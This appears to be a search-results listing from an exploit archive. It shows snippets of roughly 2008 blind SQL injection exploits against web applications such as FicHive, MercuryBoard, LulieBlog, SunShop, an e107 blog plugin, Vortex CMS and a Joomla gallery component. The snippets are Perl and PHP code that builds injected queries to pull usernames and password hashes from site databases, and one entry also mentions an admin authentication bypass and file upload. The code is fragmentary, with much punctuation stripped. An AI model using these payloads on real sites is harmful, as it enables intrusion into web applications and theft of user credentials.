4695 matches found
fichive-sql.txt
!/usr/bin/perl Usage: ./test.pl -url "http://localhost/scriptpath/index.php?go=Fiction&category= use LWP::UserAgent; use Getopt::Long; use IO::Handle; use strict; $| = 1; my $defaultdebug = 0; my $defaultlength = 13; my $defaultmethod = "GET"; my $defaulttime = 0; my $version = "1.1"; my...
MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================================== MercuryBoard settitle$this-lang-loginheader; 55. $this-tree$this-lang-loginheader; 56. 57. //print "agent: $this-agent\n"; 58. 59. if !isset$this-post'submit' 60...
MercuryBoard 1.1.5 - login.php Blind SQL Injection
MercuryBoard 1.1.5 - login.php Blind SQL Injection settitle$this-lang-loginheader; 55. $this-tree$this-lang-loginheader; 56. 57. //print "agent: $this-agent\n"; 58. 59. if !isset$this-post'submit' 60. $requesturi = $this-geturi; 61. 62. if substr$requesturi, -8 == 'register' 63. $requesturi =...
LulieBlog 1.2 Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications ============================================= LulieBlog 1.2 Multiple Remote Vulnerabilities ============================================= LulieBlog 1.2 Multiple Remote Vulnerabilities Admin Auth Bypass, Upload File, Blind SQL Injection...
Lulieblog 1.2 - Multiple Vulnerabilities
Lulieblog 1.2 - Multiple Vulnerabilities LulieBlog 1.2 Multiple Remote Vulnerabilities Admin Auth Bypass, Upload File, Blind SQL Injection Author: Cod3rZ Site: http://cod3rz.helloweb.eu Site: http://devilsnight.altervista.org Date: 06/05/2008 dd/mm/yyyy Admin Auth Bypass: Modify Articles: send a...
Lulieblog 1.2 - Multiple Vulnerabilities
LulieBlog 1.2 Multiple Remote Vulnerabilities Admin Auth Bypass, Upload File, Blind SQL Injection Author: Cod3rZ Site: http://cod3rz.helloweb.eu Site: http://devilsnight.altervista.org Date: 06/05/2008 dd/mm/yyyy Admin Auth Bypass: Modify Articles: send a request to site/Admin/articlemodif2.php...
FicHive 1.0 - category Blind SQL Injection
FicHive 1.0 - category Blind SQL Injection !/usr/bin/perl Usage: ./test.pl -url "http://localhost/scriptpath/index.php?go=Fiction&category= use LWP::UserAgent; use Getopt::Long; use IO::Handle; use strict; $| = 1; my $defaultdebug = 0; my $defaultlength = 13; my $defaultmethod = "GET"; my...
sunshop-blindsql.txt
!/usr/bin/perl -w use LWP::UserAgent; scripts : SunShop Version 3.5.1 Remote Blind Sql Injection scripts site : http://www.turnkeywebtools.com/sunshop/ Discovered By : irvian site : http://irvian.cn email : [email protected] print "\r\n+-----------------------------------------+\r\n"; print...
SunShop Version 3.5.1 Remote Blind Sql Injection
!/usr/bin/perl -w use LWP::UserAgent; scripts : SunShop Version 3.5.1 Remote Blind Sql Injection scripts site : http://www.turnkeywebtools.com/sunshop/ Discovered By : irvian site : http://irvian.cn email : [email protected] print "rn+-----------------------------------------+rn"; print "+Bli...
e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability
Exploit for unknown platform in category web applications =================================================================== e107 Plugin BLOG Engine 2.2 rid Blind SQL Injection Vulnerability =================================================================== + Author: Saime + Script: e107 Plugin...
e107blog-blindsql.txt
Author: Saime + Script: e107 Plugin BLOG Engine v2.2 rid Blind SQL Injection + URL: http://e107coders.org/download.php?view.1843 + Date: 13/05/2008 + Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot! + Site:...
joomladatso-blindsql.txt
\n"; fwrite$fs, $req; $res=fread$fs, 4096; fclose$fs; return $res; function xpl$condition, $pos global $normua; global $where; $xpl=rand1,100000."',1,ifasciisubstringselect password from users $where,$pos,1$condition,select '$normua',select link from menu/"; return $xpl; //main echo 'Joomla...
Vortex CMS (index.php pageid) Blind SQL Injection Exploit
No description provided by source. ?php iniset"maxexecutiontime",0; printr' Vortex CMS - Blind SQL Injection Exploit Vulnerability discovered by: LidlosesAuge Exploit coded by: LidlosesAuge Greetz to: -=Player=- , Suicide, g4ms3, enco GPM, Free-Hack &n...
Vortex CMS (index.php pageid) Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================================= Vortex CMS index.php pageid Blind SQL Injection Exploit ========================================================= php '.$argv0.' http://www.site.com/cms/ 1 1 '; if $argc 1 printr' '...
Vortex CMS - pageid Blind SQL Injection
Vortex CMS - pageid Blind SQL Injection php '.$argv0.' http://www.site.com/cms/ 1 1 '; if $argc 1 printr' '; echo 'Searching for Admin: '; for$i=1; $i = 50; $i++ $temp1 =...
Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit
No description provided by source. ? //Joomla Component comdatsogallery 1.6 Blind SQL Injection Exploit by +toxa+ //Greets: all members of antichat.ru & cih.ms //options settimelimit0; ignoreuserabort1; $normua='Mozilla/5.0 Windows; U; Windows NT 6.0; ru; rv:1.8.1.14 Gecko/20080404...
Vortex CMS - 'pageid' Blind SQL Injection
php '.$argv0.' http://www.site.com/cms/ 1 1 '; if $argc 1 printr' '; echo 'Searching for Admin: '; for$i=1; $i = 50; $i++ $temp1 = filegetcontents$argv1.'index.php?pageid='.$argv2.''and+lengthselect+username+from+systemuserslogins+where+id='.$argv3.'='.$i.'/'; if strpos$temp1,'Sorry, the page you...
Joomla! Component Datsogallery 1.6 - Blind SQL Injection
Joomla! Component Datsogallery 1.6 - Blind SQL Injection \n"; fwrite$fs, $req; $res=fread$fs, 4096; fclose$fs; return $res; function xpl$condition, $pos global $normua; global $where; $xpl=rand1,100000."',1,ifasciisubstringselect password from users $where,$pos,1$condition,select '$normua',select...
Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================================= Joomla Component comdatsogallery 1.6 Blind SQL Injection Exploit ================================================================= \n"; fwrite$fs, $req; $res=fread$fs, 4096;...
Joomla! Component Datsogallery 1.6 - Blind SQL Injection
\n"; fwrite$fs, $req; $res=fread$fs, 4096; fclose$fs; return $res; function xpl$condition, $pos global $normua; global $where; $xpl=rand1,100000."',1,ifasciisubstringselect password from users $where,$pos,1$condition,select '$normua',select link from menu/"; return $xpl; //main echo 'Joomla...